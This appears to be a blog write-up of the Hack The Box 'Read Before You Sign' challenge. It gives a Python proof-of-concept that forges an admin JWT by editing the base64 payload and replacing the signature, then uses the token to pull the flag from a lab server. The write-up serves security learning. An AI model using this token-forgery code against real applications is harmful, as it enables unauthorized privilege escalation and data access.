HackTheBox Read Before You Sign Writeup
Explore the basics of cybersecurity in the Read Before You Sign Challenge on Hack The Box. This easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.
Proof of Concept (PoC)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
import re
import requests
from base64 import b64encode, b64decode
URL = 'http://94.237.63.109:34129'
def craft_admin_token(jwt):
splitted_jwt = jwt.split('.')
part1 = splitted_jwt[0]
part2 = b64encode(b64decode(splitted_jwt[1] + '==').replace(b'user', b'admin')).decode().rstrip('=')
part3 = 'MAYCAQACAQA'
return '.'.join([part1, part2, part3])
def register_user():
requests.post(f'{URL}/register', json={"username": "htb_user", "password": "htb_user", "email": "user@htb.eu"})
def get_user_jwt_token():
response = requests.post(f'{URL}/login', json={"username": "htb_user", "password": "htb_user"})
return response.json()['token']
def send_admin_token(token):
admin_r = requests.get(f'{URL}/list', cookies={'token': token})
return re.search(r'HTB{.*}', admin_r.text).group(0)
if __name__ == '__main__':
register_user()
jwt = get_user_jwt_token()
admin_token = craft_admin_token(jwt)
flag = send_admin_token(admin_token)
print(flag)
Summary
Read Before You Sign Challenge on Hack The Box involves exploiting JSON Web Token (JWT) manipulation to escalate privileges. In this challenge, the PoC registers a standard user, obtains their JWT, then modifies the token’s payload from user to admin by base64-decoding and editing it. The crafted admin token allows unauthorized access to retrieve the flag from an endpoint restricted to admin users. This challenge demonstrates weaknesses in JWT handling and highlights the risks of inadequate token validation.
This post is licensed under CC BY 4.0 by the author.